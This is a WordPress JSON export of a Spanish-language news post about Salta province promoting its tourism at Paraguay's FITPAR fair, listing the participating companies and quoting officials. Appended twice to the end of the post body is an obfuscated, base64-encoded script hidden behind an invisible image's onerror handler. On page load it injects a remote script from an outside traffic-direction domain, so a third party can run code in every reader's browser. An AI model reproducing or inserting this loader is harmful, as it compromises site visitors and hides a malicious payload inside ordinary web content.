{"id":3187,"date":"2023-10-18T10:58:25","date_gmt":"2023-10-18T13:58:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3187"},"modified":"2025-08-14T00:07:05","modified_gmt":"2025-08-14T03:07:05","slug":"salta-con-presencia-en-la-feria-de-turismo-de-paraguay","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3187","title":{"rendered":"Salta con presencia en la Feria de Turismo de Paraguay"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#8e0a3c\"><em>El sector p\u00fablico y el privado conforman la presencia del destino Salta con stand propio en uno de los mercados regionales prioritarios para la provincia.<\/em><\/h4>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9413-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9413-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpg\" alt=\"Salta con presencia en la Feria de Turismo de Paraguay\" width=\"318\" height=\"212\"\/><\/a><\/figure><\/div>\n\n\n<p>La Feria Internacional de Turismo de Paraguay (FITPAR) es el encuentro de la industria m\u00e1s importante del pa\u00eds vecino y uno de los principales de Am\u00e9rica del Sur, por lo que se coordin\u00f3 una presencia integrada entre el sector p\u00fablico y privado para la promoci\u00f3n del destino y la comercializaci\u00f3n de productos por parte de los empresarios que integran la delegaci\u00f3n.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes a trav\u00e9s de Inprotur Salta, junto a la C\u00e1mara de Turismo local coordin\u00f3 la presencia de nueve empresas salte\u00f1as: Uma Travel, Willka Turismo, Silvia Magno, Amalinas Viajes y Turismo, Norte Rental, Plumaria Experiencias en el Aire, Termas Rosario de la Frontera, C\u00e1mara de Turismo y Comercio de San Lorenzo y Alejandro I.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9414-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9414-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpg\" alt=\"Salta con presencia en la Feria de Turismo de Paraguay\" width=\"336\" height=\"223\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cEl turismo internacional regional (norte de Chile, Bolivia, Paraguay y Uruguay) est\u00e1n dentro de los mercados prioritarios de Salta, por eso, no solo es importante estar en las ferias, sino tener presencia permanente a trav\u00e9s de nuestros aliados estrat\u00e9gicos, promoci\u00f3n permanente y digital\u201d manifest\u00f3 el ministro de Turismo y Deportes de Salta,<strong>&nbsp;Mario Pe\u00f1a<\/strong>, qui\u00e9n tambi\u00e9n indic\u00f3 que \u201cla estrategia es lograr en los pr\u00f3ximos a\u00f1os el mismo porcentaje de turistas paraguayos que del resto de los mercados regionales\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9415-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9415-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpeg\" alt=\"Salta con presencia en la Feria de Turismo de Paraguay\"\/><\/a><\/figure>\n\n\n\n<p>En representaci\u00f3n de la provincia se encuentra hasta la finalizaci\u00f3n de la Feria en Asunci\u00f3n, la directora ejecutiva del Inprotur Salta,&nbsp;<strong>Mar\u00eda Eugenia Cornejo<\/strong>.<\/p>\n\n\n\n<p>Las acciones de promoci\u00f3n dise\u00f1adas para el \u00faltimo cuatrimestre del a\u00f1o se enfocan en mercados prioritarios en lo que respecta a la emisi\u00f3n de turistas que a\u00f1o a a\u00f1o visitan la provincia.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9416-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9416-salta-con-presencia-en-la-feria-de-turismo-de-paraguay.jpg\" alt=\"Salta con presencia en la Feria de Turismo de Paraguay\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-con-presencia-en-la-feria-de-turismo-de-paraguay-92374\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El sector p\u00fablico y el privado conforman la presencia del destino Salta con stand propio en uno de los mercados regionales prioritarios para la provincia. La Feria Internacional de Turismo de Paraguay (FITPAR) es el encuentro de la industria m\u00e1s importante del pa\u00eds vecino y uno de los principales de Am\u00e9rica del Sur, por lo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3188,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-3187","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3187"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3187"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3187\/revisions"}],"predecessor-version":[{"id":6944,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3187\/revisions\/6944"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3188"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}